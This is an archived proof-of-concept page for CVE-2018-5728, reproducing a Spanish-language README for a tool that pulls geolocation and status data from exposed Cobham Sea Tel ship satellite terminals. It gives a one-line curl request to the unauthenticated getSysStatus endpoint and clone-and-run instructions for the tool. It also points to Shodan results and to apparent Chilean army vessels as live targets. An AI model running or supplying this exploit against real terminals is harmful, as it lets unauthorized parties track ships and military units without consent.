Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-5728 PoC — Cobham Sea Tel 安全漏洞

Source
https://github.com/ezelf/seatel_terminals
Associated Vulnerability
Title:Cobham Sea Tel 安全漏洞 (CVE-2018-5728)
Description:Cobham Sea Tel是英国Cobham公司的一套无线通信终端产品。 Cobham Sea Tel 121 build 222701版本中存在安全漏洞。远程攻击者可通过发送/cgi-bin/getSysStatus请求利用该漏洞获取敏感信息。
Description
[CVE-2018-5728] Terminal Satelitales Seatel exponen geolocalización
Readme
# Terminales Seatel 
Las embarcaciones que ocupan la plataforma satelital Seatel (de la firma Cobham), cuenta con una serie de vulnerabilidades sobre los servicios de la misma terminal, que podría permitir fácilmente a terceros no autorizados entre otras cosas conocer su geolocalización.

![seatel_home](img/Radomos.jpg) 


#  [Exploit] Terminales Seatel 

	[*] Exploit Title:      "Sensitive exposure from Seatel satellite terminal" 
	[*] CVE:                 CVE-2018-5728
	[*] CVSS Base Score v3:  7.1 / 10
	[*] CVSS Vector String:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
	[*] Exploit Author:      Fernandez Ezequiel ( twitter:@capitan_alfa )

	

### Simple PoC:

```
	$> curl "http://<seatel_host>:<port>/cgi-bin/getSysStatus"

```
## In the Wild:
![seatel_dorks_0](img/shodan_poc_1.png) 


# TOOL: "Seatel exposed ship"

## Quick start

	usr@pwn:~$ git clone https://github.com/ezelf/seatel_terminals.git
	usr@pwn:~$ cd seatel_terminals
	Usr@pwn:~$ python seaTel.py --host <host>

## help

	usage: seaTel.py [-h] [-v] --host HOST [--port PORT]

	[+] Where are you ship ?

	optional arguments:
	  -h, --help     show this help message and exit
	  -v, --version  show program's version number and exit
	  --host HOST    Host
	  --port PORT    Port (default 80)

	usr@pwn:~$ python seaTel.py --host <host>


## Pocs (Output) :
![seatel_poc_4](img/poc_tool_1.png)
![seatel_poc_4](img/poc_tool_2.png)


### Extra: CHILE ARMY !!!
![chile_army_1](img/2.jpg)
![chile_army_2](img/4.jpeg)


### Blog:
https://misteralfa-hack.blogspot.com/2019/08/cobham-terminales-satelitales-seatel.html


I see you... ! xd
File Snapshot

 [4.0K]  /data/pocs/ad62f6734459abac7f310b3e1337fa6837578435
├── [4.0K]  img
│   ├── [ 62K]  2.jpg
│   ├── [ 31K]  4.jpeg
│   ├── [ 65K]  home.png
│   ├── [ 34K]  home_sat.png
│   ├── [ 47K]  poc_1_.png
│   ├── [ 50K]  poc_tool_1.png
│   ├── [ 33K]  poc_tool_2.png
│   ├── [ 64K]  Radomos.jpg
│   ├── [ 12K]  seatel-cobham-logo.png
│   └── [ 99K]  shodan_poc_1.png
├── [1.6K]  README.md
└── [3.7K]  seatelTerms.py

1 directory, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.